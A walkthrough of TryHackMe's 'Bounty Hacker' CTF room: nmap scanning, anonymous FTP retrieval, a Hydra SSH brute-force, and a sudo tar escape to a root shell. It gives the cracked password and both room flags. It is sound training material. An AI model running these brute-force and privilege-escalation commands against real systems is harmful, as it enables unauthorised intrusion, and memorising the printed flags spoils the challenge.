Understanding the CTF Challenge
Capture The Flag (CTF) challenges are hands-on exercises designed to test and improve cybersecurity skills. This guide explores the "Bounty Hacker" room on TryHackMe, demonstrating how to identify vulnerabilities, exploit services, and escalate privileges to gain root access. By following this walkthrough, you'll learn essential techniques like network scanning, brute-forcing, and privilege escalation in a controlled environment.
Key Phases of the Challenge
- Reconnaissance: Identify open ports and services using
nmap - Exploitation: Leverage weak configurations (e.g., anonymous FTP login)
- Credential Attacks: Brute-force SSH access with
Hydra - Privilege Escalation: Abuse sudo permissions to gain root access
Step 1: Reconnaissance with Nmap
Start by scanning the target machine to discover open ports and running services. This step is critical for identifying potential attack vectors.
Command
nmap -sC -sV -A -T4 -v -p- 10.10.69.196
Scan Results
| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 |
| 22 | SSH | OpenSSH 7.2p2 |
| 80 | HTTP | Apache httpd 2.4.18 |
Note: The
-sCflag runs default scripts,-sVdetects service versions, and-Aenables OS detection.
Step 2: Exploiting FTP for Initial Access
The FTP service allows anonymous login, a common misconfiguration that can expose sensitive files.
Retrieve Files
-
Connect to FTP:
ftp 10.10.69.196- Username:
anonymous - Password: (leave blank)
- Username:
-
Download the files:
get locks.txt get task.txt
Analyzing task.txt
The file reveals the username lin, which will be useful for later steps.
Step 3: Brute-Forcing SSH with Hydra
The locks.txt file contains potential passwords. Use Hydra to brute-force SSH access.
Prepare Wordlists
- Create
users.txtwith the usernamelin. - Use
locks.txtas the password list.
Execute Hydra
hydra ssh://10.10.69.196 -L users.txt -P locks.txt
Successful Credentials
[22][ssh] host: 10.10.69.196 login: lin password: RedDr4gonSynd1cat3
Step 4: Gaining User Access
Log in via SSH and retrieve the user.txt flag.
Connect to SSH
ssh lin@10.10.69.196
- Password:
RedDr4gonSynd1cat3
Read user.txt
THM{CR1M3_SyNd1C4T3}
Step 5: Privilege Escalation to Root
Check sudo permissions to identify misconfigurations.
Check Sudo Rights
sudo -l
Output:
User lin may run the following commands on bountyhacker:
(root) /bin/tar
Exploit tar for Root Access
Use the following payload to spawn a root shell:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Retrieve root.txt
THM{80UN7Y_h4cK3r}
Common Pitfalls & Best Practices
- FTP Misconfigurations: Always check for anonymous login. Disable it in production environments.
- Brute-Force Attacks: Use strong passwords and rate-limiting to mitigate risks.
- Sudo Abuse: Restrict sudo permissions to essential commands only.
Learn More
- Privilege Escalation Techniques: Explore GTFOBins for binaries that can be abused for privilege escalation.
- Nmap Scanning: Learn advanced scanning techniques with the Nmap Official Book.
- TryHackMe Rooms: Practice similar challenges in the Offensive Pentesting Path.